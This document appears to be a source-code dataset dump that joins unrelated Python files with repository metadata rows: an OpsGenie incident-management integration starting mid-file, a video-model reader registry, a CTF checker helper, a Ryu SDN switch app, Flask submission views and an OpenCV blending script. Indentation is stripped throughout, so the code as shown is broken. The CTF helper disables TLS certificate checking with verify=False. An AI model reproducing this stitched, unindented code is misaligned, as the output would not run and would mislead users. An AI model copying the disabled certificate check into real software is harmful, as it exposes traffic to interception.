res = self._http_request(method='GET',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}",
params=params
)
if len(res.get("data", [])) > 0:
for result in res.get("data"):
result['event_type'] = INCIDENT_TYPE
return res
def close_incident(self, args: dict):
return self._http_request(method='POST',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/"
f"{args.get('incident_id')}/close",
json_data=args)
def resolve_incident(self, args: dict):
return self._http_request(method='POST',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/"
f"{args.get('incident_id')}/resolve",
json_data=args)
def add_responder_incident(self, args: dict):
args['responders'] = argToList(args.get('responders'))
args.update(Client.responders_to_json(args.get('responders', []), "responder"))
return self._http_request(method='POST',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/"
f"{args.get('incident_id')}/responders",
json_data=args)
def add_tag_incident(self, args: dict):
args['tags'] = argToList(args.get('tags'))
return self._http_request(method='POST',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/"
f"{args.get('incident_id')}/tags",
json_data=args)
def remove_tag_incident(self, args: dict):
args['tags'] = argToList(args.get('tags'))
return self._http_request(method='DELETE',
url_suffix=f"/v1/{INCIDENTS_SUFFIX}/"
f"{args.get('incident_id')}/tags",
params={"tags": args.get('tags')},
json_data=args)
def get_team(self, args: dict):
return self._http_request(method='GET',
url_suffix=f"/v2/{TEAMS_SUFFIX}/{args.get('team_id')}"
)
def list_teams(self):
return self._http_request(method='GET',
url_suffix=f"/v2/{TEAMS_SUFFIX}"
)
''' COMMAND FUNCTIONS '''
def run_polling_paging_command(args: dict, cmd: str, results_function: Callable,
action_function: Optional[Callable] = None) -> CommandResults:
ScheduledCommand.raise_error_if_not_supported()
interval_in_secs = int(args.get('interval_in_seconds', DEFAULT_POLL_INTERVAL))
result = args.get('result', [])
limit = int(args.get('limit', 20))
if "request_id" not in args and action_function:
# starting new flow
results = action_function(args)
request_id = results.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {results}")
next_paging = results.get("paging", {}).get("next")
result = result + results.get("data")
if not next_paging or len(result) >= limit:
# If not a paged request, simply return
return CommandResults(
outputs_prefix=args.get("output_prefix", "OpsGenie"),
outputs=results.get("data"),
readable_output=tableToMarkdown("OpsGenie", results.get('data'),
headers=['id', 'createdAt', 'acknowledged', 'count', 'status', 'tags'],
removeNull=True
),
raw_response=results
)
else:
# If a paged request, return scheduled_command
args['request_id'] = request_id
args['result'] = result
args['paging'] = next_paging
polling_args = {
'interval_in_seconds': interval_in_secs,
'polling': True,
**args
}
scheduled_command = ScheduledCommand(
command=cmd,
next_run_in_seconds=int(args.get('interval_in_seconds', DEFAULT_POLL_INTERVAL)),
args=polling_args,
timeout_in_seconds=int(args.get('timeout_in_seconds', DEFAULT_POLL_TIMEOUT)),
)
return CommandResults(scheduled_command=scheduled_command,
readable_output=f"Waiting for request_id={request_id}",
outputs_prefix=args.get("output_prefix", "OpsGenie"),
outputs={"requestId": request_id})
results = results_function(args)
result = result + results.get("data")
results['data'] = result
next_paging = results.get("paging", {}).get("next")
if not next_paging or len(result) >= limit:
# If not a paged request, simply return
return CommandResults(
outputs_prefix=args.get("output_prefix", "OpsGenie"),
outputs=results.get("data"),
readable_output=tableToMarkdown("OpsGenie", results.get('data'),
headers=['id', 'createdAt', 'acknowledged', 'count', 'status', 'tags'],
removeNull=True
),
raw_response=results
)
if len(result) < limit:
# schedule next poll
args['request_id'] = results.get('request_id')
args['result'] = result
args['paging'] = next_paging
polling_args = {
'interval_in_seconds': interval_in_secs,
'polling': True,
**args
}
scheduled_command = ScheduledCommand(
command=cmd,
next_run_in_seconds=int(args.get('interval_in_seconds', DEFAULT_POLL_INTERVAL)),
args=polling_args,
timeout_in_seconds=int(args.get('timeout_in_seconds', DEFAULT_POLL_TIMEOUT))
)
# result with scheduled_command only - no update to the war room
command_results = CommandResults(scheduled_command=scheduled_command,
readable_output=f"Waiting for request_id={args.get('request_id')}",
outputs_prefix=args.get("output_prefix", "OpsGenie"),
outputs={"requestId": args.get('request_id')})
return command_results
return CommandResults(outputs_prefix=args.get("output_prefix", "OpsGenie"),
outputs=results.get("data"),
readable_output=tableToMarkdown("OpsGenie", results.get('data'),
headers=['id', 'createdAt', 'acknowledged', 'count', 'status',
'tags'],
removeNull=True
),
raw_response=results
)
def test_module(client: Client, params: dict) -> str:
"""
Tries to run list_alerts, returning OK if integration is working.
"""
result_list = client.list_alerts({"sort": "createdAt", "limit": 5})
result_fetch = [{'ok': 'ok'}]
if params.get("isFetch"):
result_fetch, last_run = fetch_incidents_command(client, params)
if result_list and result_fetch:
return 'ok'
return 'Failed.'
def create_alert(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.Alert',
**args
}
data = client.create_alert(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def get_alerts(client: Client, args: Dict[str, Any]) -> CommandResults:
alert_id = args.get("alert-id", None)
result = client.get_alert(alert_id) if alert_id else list_alerts(client, args)
if isinstance(result, CommandResults):
return result
return CommandResults(
outputs_prefix="OpsGenie.Alert",
outputs=result.get("data"),
readable_output=tableToMarkdown("OpsGenie Alert",
result.get("data"),
headers=['id', 'createdAt', 'acknowledged', 'count', 'status', 'tags'],
removeNull=True
),
raw_response=result
)
def list_alerts(client: Client, args: Dict[str, Any]) -> CommandResults:
polling_args = {
'url_suffix': f"/v2/{ALERTS_SUFFIX}",
'output_prefix': 'OpsGenie.Alert',
'request_type': ALERTS_SUFFIX,
**args
}
polling_result = run_polling_paging_command(args=polling_args,
cmd='opsgenie-get-alerts',
action_function=client.list_alerts,
results_function=client.get_paged)
return polling_result
def delete_alert(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.DeletedAlert',
**args
}
data = client.delete_alert(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def ack_alert(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.AckedAlert',
**args
}
data = client.ack_alert(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def close_alert(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.ClosedAlert',
**args
}
data = client.close_alert(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def assign_alert(client: Client, args: Dict[str, Any]) -> CommandResults:
if args.get("owner_id"):
owner = {"id": args.get("owner_id")}
elif args.get("owner_username"):
owner = {"username": args.get("owner_username")}
else: # not args.get("owner_id") and not args.get("owner_username")
raise DemistoException("Either owner_id or owner_username should be provided.")
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.AssignAlert',
'owner': owner,
**args
}
data = client.assign_alert(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def add_responder_alert(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.AddResponderAlert',
**args
}
data = client.add_responder_alert(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def get_escalations(client: Client, args: Dict[str, Any]) -> CommandResults:
escalation = args.get("escalation_id", None) or args.get("escalation_name", None)
result = client.get_escalation(args) if escalation else client.get_escalations()
return CommandResults(
outputs_prefix="OpsGenie.Escalations",
outputs=result.get("data"),
readable_output=tableToMarkdown("OpsGenie Escalations", result.get("data")),
raw_response=result
)
def escalate_alert(client: Client, args: Dict[str, Any]) -> CommandResults:
if args.get("escalation_id"):
escalation = {"id": args.get("escalation_id")}
elif args.get("escalation_name"):
escalation = {"name": args.get("escalation_name")}
else: # not args.get("owner_id") and not args.get("owner_username")
raise DemistoException("Either escalation_id or escalation_name should be provided.")
args = {
'request_type': ALERTS_SUFFIX,
'escalation': escalation,
'output_prefix': 'OpsGenie.EscalateAlert',
**args
}
data = client.escalate_alert(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def add_alert_tag(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.AddTagAlert',
**args
}
data = client.add_alert_tag(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def remove_alert_tag(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': ALERTS_SUFFIX,
'output_prefix': 'OpsGenie.RemoveTagAlert',
**args
}
data = client.remove_alert_tag(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def get_alert_attachments(client: Client, args: Dict[str, Any]) -> CommandResults:
result = client.get_alert_attachments(args)
return CommandResults(
outputs_prefix="OpsGenie.Alert.Attachment",
outputs=result.get("data"),
readable_output=tableToMarkdown("OpsGenie Attachment", result.get("data")),
raw_response=result
)
def get_schedules(client: Client, args: Dict[str, Any]) -> CommandResults:
schedule = args.get("schedule_id", None) or args.get("schedule_name", None)
result = client.get_schedule(args) if schedule else client.list_schedules()
return CommandResults(
outputs_prefix="OpsGenie.Schedule",
outputs=result.get("data"),
readable_output=tableToMarkdown("OpsGenie Schedule", result.get("data")),
raw_response=result
)
def get_schedule_overrides(client: Client, args: Dict[str, Any]) -> CommandResults:
if not args.get("schedule_id") and not args.get("schedule_name"):
raise DemistoException("Either schedule_id or schedule_name should be provided.")
result = client.get_schedule_override(args) if args.get("override_alias") \
else client.list_schedule_overrides(args)
return CommandResults(
outputs_prefix="OpsGenie.Schedule",
outputs=result.get("data"),
readable_output=tableToMarkdown("OpsGenie Schedule", result.get("data")),
raw_response=result
)
def get_on_call(client: Client, args: Dict[str, Any]) -> CommandResults:
if args.get("schedule_id"):
schedule = args.get("schedule_id")
schedule_identifier_type = 'id'
elif args.get("schedule_name"):
schedule = args.get("schedule_name")
schedule_identifier_type = 'name'
else: # not args.get("schedule_id") and not args.get("schedule_name")
raise DemistoException("Either schedule_id or schedule_name should be provided.")
on_call_args = {
'request_type': SCHEDULE_SUFFIX,
'scheduleIdentifierType': schedule_identifier_type,
'schedule': schedule,
**args
}
result = client.get_on_call(on_call_args)
command_result = CommandResults(
outputs_prefix="OpsGenie.Schedule.OnCall",
outputs=result,
readable_output=tableToMarkdown("OpsGenie Schedule OnCall", result.get('data')),
raw_response=result
)
return command_result
def create_incident(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': INCIDENTS_SUFFIX,
'output_prefix': 'OpsGenie.Incident',
**args
}
data = client.create_incident(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def delete_incident(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': INCIDENTS_SUFFIX,
'output_prefix': 'OpsGenie.DeletedIncident',
**args
}
data = client.delete_incident(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def get_incidents(client: Client, args: Dict[str, Any]) -> CommandResults:
incident_id = args.get("incident_id", None)
result = client.get_incident(args) if incident_id else list_incidents(client, args)
if isinstance(result, CommandResults):
return result
return CommandResults(
outputs_prefix="OpsGenie.Incident",
outputs=result.get("data"),
readable_output=tableToMarkdown("OpsGenie Incident",
result.get("data"),
headers=['id', 'createdAt', 'acknowledged', 'count', 'status', 'tags'],
removeNull=True
),
raw_response=result
)
def list_incidents(client: Client, args: Dict[str, Any]) -> CommandResults:
polling_args = {
'url_suffix': f"/v1/{INCIDENTS_SUFFIX}",
'output_prefix': 'OpsGenie.Incident',
**args
}
polling_result = run_polling_paging_command(args=polling_args,
cmd='opsgenie-get-incidents',
action_function=client.list_incidents,
results_function=client.get_paged)
return polling_result
def close_incident(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': INCIDENTS_SUFFIX,
'output_prefix': 'OpsGenie.ClosedIncident',
**args
}
data = client.close_incident(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def resolve_incident(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': INCIDENTS_SUFFIX,
'output_prefix': 'OpsGenie.ResolvedIncident',
**args
}
data = client.resolve_incident(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def add_responder_incident(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': INCIDENTS_SUFFIX,
'output_prefix': 'OpsGenie.AddResponderIncident',
**args
}
data = client.add_responder_incident(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def add_tag_incident(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': INCIDENTS_SUFFIX,
'output_prefix': 'OpsGenie.AddTagIncident',
**args
}
data = client.add_tag_incident(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def remove_tag_incident(client: Client, args: Dict[str, Any]) -> CommandResults:
args = {
'request_type': INCIDENTS_SUFFIX,
'output_prefix': 'OpsGenie.RemoveTagIncident',
**args
}
data = client.remove_tag_incident(args)
request_id = data.get("requestId")
if not request_id:
raise ConnectionError(f"Failed to send request - {data}")
args['request_id'] = request_id
return get_request_command(client, args)
def get_request_command(client: Client, args: Dict[str, Any]) -> CommandResults:
request_type = str(args.get('request_type'))
results: Response = client.get_request(args)
if results.status_code == 404:
ScheduledCommand.raise_error_if_not_supported()
request_id = args.get('request_id')
return CommandResults(
raw_response=results,
readable_output=None if args.get('polled_once') else f"Waiting for request_id={request_id}",
outputs_prefix=args.get("output_prefix", "OpsGenie.Request"),
outputs=None if args.get('polled_once') else {"requestId": request_id},
scheduled_command=ScheduledCommand(command='opsgenie-get-request',
next_run_in_seconds=int(
args.get('interval_in_seconds', DEFAULT_POLL_INTERVAL)),
args={**args, 'polled_once': True},
timeout_in_seconds=int(
args.get('timeout_in_seconds', DEFAULT_POLL_TIMEOUT))))
else:
results_dict = results.json()
return CommandResults(
outputs_prefix=args.get("output_prefix", f'OpsGenie.{request_type.capitalize()[:-1]}'),
outputs=results_dict.get("data"),
readable_output=tableToMarkdown("OpsGenie", results_dict.get('data')),
raw_response=results_dict
)
def get_teams(client: Client, args: Dict[str, Any]) -> CommandResults:
result = client.get_team(args) if args.get("team_id") else client.list_teams()
return CommandResults(
outputs_prefix="OpsGenie.Team",
outputs=result.get("data"),
readable_output=tableToMarkdown("OpsGenie Team", result.get("data")),
raw_response=result
)
def _parse_fetch_time(fetch_time: str):
return dateparser.parse(date_string=f"{fetch_time} UTC").strftime(DATE_FORMAT)
def fetch_incidents_by_type(client: Client,
query: Optional[str],
limit: Optional[int],
fetch_time: str,
status: Optional[str],
priority: Optional[str],
tags: Optional[str],
incident_fetching_func: Callable,
now: datetime,
last_run_dict: Optional[dict] = None):
params: Dict[str, Any] = {}
if not last_run_dict:
new_last_run = _parse_fetch_time(fetch_time)
last_run_dict = {'lastRun': new_last_run,
'next_page': None}
if last_run_dict.get('next_page'):
raw_response = client.get_paged({"paging": last_run_dict.get('next_page')})
else:
timestamp_now = int(now.timestamp())
last_run = last_run_dict.get('lastRun')
timestamp_last_run = int(dateparser.parse(last_run).timestamp())
time_query = f'createdAt>{timestamp_last_run} AND createdAt<={timestamp_now}'
params['query'] = f'{query} AND {time_query}' if query else f'{time_query}'
params['limit'] = limit
params['is_fetch_query'] = True if query else False
params['status'] = status
params["priority"] = priority
params["tags"] = tags
raw_response = incident_fetching_func(params)
last_run_dict['lastRun'] = now.strftime(DATE_FORMAT)
data = raw_response.get('data')
incidents = []
if data:
for event in data:
incidents.append({
'name': event.get('message'),
'occurred': event.get('createdAt'),
'rawJSON': json.dumps(event)
})
if last_run_dict.get('lastRun') < event.get('createdAt'):
last_run_dict['lastRun'] = event.get('createdAt')
return incidents, raw_response.get("paging", {}).get("next"), last_run_dict.get('lastRun')
def _get_utc_now():
return datetime.utcnow()
def fetch_incidents_command(client: Client,
params: Dict[str, Any],
last_run: Optional[Dict] = None) -> Tuple[List[Dict[str, Any]], Dict]:
"""Uses to fetch incidents into Demisto
Documentation: https://github.com/demisto/content/tree/master/docs/fetching_incidents
Args:
client: Client object with request
last_run: Last fetch object occurs
params: demisto params
Returns:
incidents, new last_run
"""
demisto.debug(f"Got incidentType={params.get('event_types')}")
event_type = params.get('event_types', [ALL_TYPE])
demisto.debug(f"Got event_type={event_type}")
now = _get_utc_now()
incidents = []
alerts = []
last_run_alerts = demisto.get(last_run, f"{ALERT_TYPE}.lastRun")
next_page_alerts = demisto.get(last_run, f"{ALERT_TYPE}.next_page")
last_run_incidents = demisto.get(last_run, f"{INCIDENT_TYPE}.lastRun")
next_page_incidents = demisto.get(last_run, f"{INCIDENT_TYPE}.next_page")
query = params.get('query')
limit = int(params.get('max_fetch', 50))
fetch_time = params.get('first_fetch', '3 days').strip()
status = params.get('status')
priority = params.get('priority')
tags = params.get('tags')
if ALERT_TYPE in event_type or ALL_TYPE in event_type:
alerts, next_page_alerts, last_run_alerts = fetch_incidents_by_type(client,
query,
limit,
fetch_time,
status,
priority,
tags,
client.list_alerts,
now,
demisto.get(last_run, f"{ALERT_TYPE}"))
if INCIDENT_TYPE in event_type or ALL_TYPE in event_type:
incidents, next_page_incidents, last_run_incidents = fetch_incidents_by_type(client,
query,
limit,
fetch_time,
status,
priority,
tags,
client.list_incidents,
now,
demisto.get(last_run, f"{INCIDENT_TYPE}"))
return incidents + alerts, {ALERT_TYPE: {'lastRun': last_run_alerts,
'next_page': next_page_alerts},
INCIDENT_TYPE: {'lastRun': last_run_incidents,
'next_page': next_page_incidents}
}
''' MAIN FUNCTION '''
def main() -> None:
api_key = demisto.params().get('credentials', {}).get("password")
base_url = demisto.params().get('url')
verify_certificate = not demisto.params().get('insecure', False)
proxy = demisto.params().get('proxy', False)
demisto.debug(f'Command being called is {demisto.command()}')
try:
client = Client(
base_url=base_url,
verify=verify_certificate,
proxy=proxy,
headers={
"Authorization": f"GenieKey {api_key}",
}
)
commands = {
'opsgenie-create-alert': create_alert,
'opsgenie-get-alerts': get_alerts,
'opsgenie-delete-alert': delete_alert,
'opsgenie-ack-alert': ack_alert,
'opsgenie-close-alert': close_alert,
'opsgenie-assign-alert': assign_alert,
'opsgenie-add-responder-alert': add_responder_alert,
'opsgenie-get-escalations': get_escalations,
'opsgenie-escalate-alert': escalate_alert,
'opsgenie-add-alert-tag': add_alert_tag,
'opsgenie-remove-alert-tag': remove_alert_tag,
'opsgenie-get-alert-attachments': get_alert_attachments,
'opsgenie-get-schedules': get_schedules,
'opsgenie-get-schedule-overrides': get_schedule_overrides,
'opsgenie-get-on-call': get_on_call,
'opsgenie-create-incident': create_incident,
'opsgenie-delete-incident': delete_incident,
'opsgenie-get-incidents': get_incidents,
'opsgenie-close-incident': close_incident,
'opsgenie-resolve-incident': resolve_incident,
'opsgenie-add-responder-incident': add_responder_incident,
'opsgenie-add-tag-incident': add_tag_incident,
'opsgenie-remove-tag-incident': remove_tag_incident,
'opsgenie-get-teams': get_teams,
'opsgenie-get-request': get_request_command
}
command = demisto.command()
if command == 'test-module':
# This is the call made when pressing the integration Test button.
return_results(test_module(client, demisto.params()))
elif command == 'fetch-incidents':
incidents, new_run_date = fetch_incidents_command(client=client,
params=demisto.params(),
last_run=demisto.getLastRun().get('lastRun'))
demisto.setLastRun(new_run_date)
demisto.incidents(incidents)
elif command in commands:
return_results(commands[command](client, demisto.args()))
else:
raise NotImplementedError(f'Command "{command}" was not implemented.')
# Log exceptions and return errors
except Exception as e:
demisto.error(traceback.format_exc()) # print the traceback
return_error(f'Failed to execute {demisto.command()} command.\nError:\n{str(e)}')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
| 43.061584 | 127 | 0.56145 |
547b2d6bb2495dadccd53e178ab80cb656a66496
| 552 |
py
|
Python
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/applications/FootballAction/predict/action_detect/reader/__init__.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 5 |
2022-01-30T07:35:58.000Z
|
2022-02-08T05:45:20.000Z
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/applications/FootballAction/predict/action_detect/reader/__init__.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 1 |
2022-01-14T02:33:28.000Z
|
2022-01-14T02:33:28.000Z
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/applications/FootballAction/predict/action_detect/reader/__init__.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 1 |
2022-01-24T16:27:01.000Z
|
2022-01-24T16:27:01.000Z
|
"""
read map for model
"""
from reader.reader_utils import regist_reader, get_reader
import reader.tsminf_reader as tsminf_reader
import reader.audio_reader as audio_reader
import reader.bmninf_reader as bmninf_reader
import reader.feature_reader as feature_reader
# regist reader, sort by alphabet
regist_reader("TSM", tsminf_reader.TSMINFReader)
regist_reader("PPTSM", tsminf_reader.TSMINFReader)
regist_reader("AUDIO", audio_reader.AudioReader)
regist_reader("BMN", bmninf_reader.BMNINFReader)
regist_reader("ACTION", feature_reader.FeatureReader)
| 34.5 | 57 | 0.84058 |
5480abd39228b998376048cbfebd7715298f8684
| 184 |
py
|
Python
|
checker/responsivesecurity/reference.py
|
fausecteam/faustctf-2019-responsivesecurity
|
65b4e02bdc9de278166c38697ab992638977d511
|
[
"0BSD"
] | null | null | null |
checker/responsivesecurity/reference.py
|
fausecteam/faustctf-2019-responsivesecurity
|
65b4e02bdc9de278166c38697ab992638977d511
|
[
"0BSD"
] | null | null | null |
checker/responsivesecurity/reference.py
|
fausecteam/faustctf-2019-responsivesecurity
|
65b4e02bdc9de278166c38697ab992638977d511
|
[
"0BSD"
] | null | null | null |
import requests
def store(endpoint, userid, path, data):
url = endpoint + "/storage/" + userid + path
requests.put(url, data, verify=False).raise_for_status()
return url
| 23 | 60 | 0.684783 |
49c487ef587c7b158983999f158978fddaa2b66d
| 3,758 |
py
|
Python
|
ryu/app/App/simple_switch_lacp_13.py
|
yuesir137/SDN-CLB
|
58b12a9412cffdf2945440528b1885c8899edd08
|
[
"Apache-2.0"
] | null | null | null |
ryu/app/App/simple_switch_lacp_13.py
|
yuesir137/SDN-CLB
|
58b12a9412cffdf2945440528b1885c8899edd08
|
[
"Apache-2.0"
] | null | null | null |
ryu/app/App/simple_switch_lacp_13.py
|
yuesir137/SDN-CLB
|
58b12a9412cffdf2945440528b1885c8899edd08
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2016 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_3
from ryu.lib import lacplib
from ryu.lib.dpid import str_to_dpid
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.app.App import simple_switch_13
class SimpleSwitchLacp13(simple_switch_13.SimpleSwitch13):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
_CONTEXTS = {'lacplib': lacplib.LacpLib}
def __init__(self, *args, **kwargs):
super(SimpleSwitchLacp13, self).__init__(*args, **kwargs)
self.mac_to_port = {}
self._lacp = kwargs['lacplib']
self._lacp.add(
dpid=str_to_dpid('0000000000000001'), ports=[1, 2])
def del_flow(self, datapath, match):
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
mod = parser.OFPFlowMod(datapath=datapath,
command=ofproto.OFPFC_DELETE,
out_port=ofproto.OFPP_ANY,
out_group=ofproto.OFPG_ANY,
match=match)
datapath.send_msg(mod)
@set_ev_cls(lacplib.EventPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
in_port = msg.match['in_port']
pkt = packet.Packet(msg.data)
eth = pkt.get_protocols(ethernet.ethernet)[0]
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info("packet in %s %s %s %s", dpid, src, dst, in_port)
# learn a mac address to avoid FLOOD next time.
self.mac_to_port[dpid][src] = in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
actions = [parser.OFPActionOutput(out_port)]
# install a flow to avoid packet_in next time
if out_port != ofproto.OFPP_FLOOD:
match = parser.OFPMatch(in_port=in_port, eth_dst=dst)
self.add_flow(datapath, 1, match, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
out = parser.OFPPacketOut(datapath=datapath, buffer_id=msg.buffer_id,
in_port=in_port, actions=actions, data=data)
datapath.send_msg(out)
@set_ev_cls(lacplib.EventSlaveStateChanged, MAIN_DISPATCHER)
def _slave_state_changed_handler(self, ev):
datapath = ev.datapath
dpid = datapath.id
port_no = ev.port
enabled = ev.enabled
self.logger.info("slave state changed port: %d enabled: %s",
port_no, enabled)
if dpid in self.mac_to_port:
for mac in self.mac_to_port[dpid]:
match = datapath.ofproto_parser.OFPMatch(eth_dst=mac)
self.del_flow(datapath, match)
del self.mac_to_port[dpid]
self.mac_to_port.setdefault(dpid, {})
| 36.134615 | 78 | 0.645822 |
3f96144e12d1622322c83cb3d83ef7986e075957
| 1,601 |
py
|
Python
|
app/submission/views.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | 2 |
2019-06-24T08:34:39.000Z
|
2019-06-27T12:23:47.000Z
|
app/submission/views.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | null | null | null |
app/submission/views.py
|
pushyzheng/docker-oj-web
|
119abae3763cd2e53c686a320af7f4f5af1f16ca
|
[
"MIT"
] | null | null | null |
# encoding:utf-8
from app import app
from app.common.models import RoleName
from app.submission.models import Submission, JudgementStatus
from app.auth.main import auth
from flask import abort, g
from sqlalchemy import desc
from utils import sort_and_distinct, success
@app.route('/submissions/<id>', methods=['GET'])
@auth(role=RoleName.USER)
def submission(id):
sub = Submission.query.filter_by(id=id).first()
if not sub:
abort(404, 'The submission not found.')
if sub.result == JudgementStatus.ACCEPTED:
time_rate, memory_rate = count_exceeding_rate(sub)
setattr(sub, 'time_rate', time_rate)
setattr(sub, 'memory_rate', memory_rate)
return success(sub.to_dict())
@app.route('/submissions/latest', methods=['GET'])
@auth(role=RoleName.USER)
def get_latest_submission():
sub = Submission.query.filter_by(user_id=g.user.id).order_by(desc(Submission.timestamp)).first()
if not sub:
return success(None)
return success(sub.to_dict())
# 计算时间复杂度超过率、空间复杂度超过率
def count_exceeding_rate(sub):
submissions = Submission.query.filter_by(result=JudgementStatus.ACCEPTED).all()
time_list = [each.runtime_time for each in submissions]
memory_list = [each.runtime_memory for each in submissions]
time_rate = count_rank(time_list, sub.runtime_time)
memory_rate = count_rank(memory_list, sub.runtime_memory)
return time_rate, memory_rate
# 计算值在列表中的排名
def count_rank(data_list, val):
data_list = sort_and_distinct(data_list)
time_rate = data_list.index(val) / len(data_list)
return round(time_rate, 2)
| 30.207547 | 100 | 0.736415 |
b7d808980868588ae5518edfdca06b98d080d318
| 208 |
py
|
Python
|
python/image_processing/alpha_add.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 16 |
2018-11-26T08:39:42.000Z
|
2019-05-08T10:09:52.000Z
|
python/image_processing/alpha_add.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 8 |
2020-05-04T06:29:26.000Z
|
2022-02-12T05:33:16.000Z
|
python/image_processing/alpha_add.py
|
SayanGhoshBDA/code-backup
|
8b6135facc0e598e9686b2e8eb2d69dd68198b80
|
[
"MIT"
] | 5 |
2020-02-11T16:02:21.000Z
|
2021-02-05T07:48:30.000Z
|
import numpy as np
import cv2
img1 = cv2.imread('pittsburgh.jpg')
img2 = cv2.imread('preston.jpg')
dst = cv2.addWeighted(img1,0.7,img2,0.3,0)
cv2.imshow('dst',dst)
cv2.waitKey(0)
cv2.destroyAllWindows()
| 14.857143 | 42 | 0.716346 |
4d47c6666ea6a4f78a03c672c40a675cf7f35ebc
| 9,033 |
py
|
Python
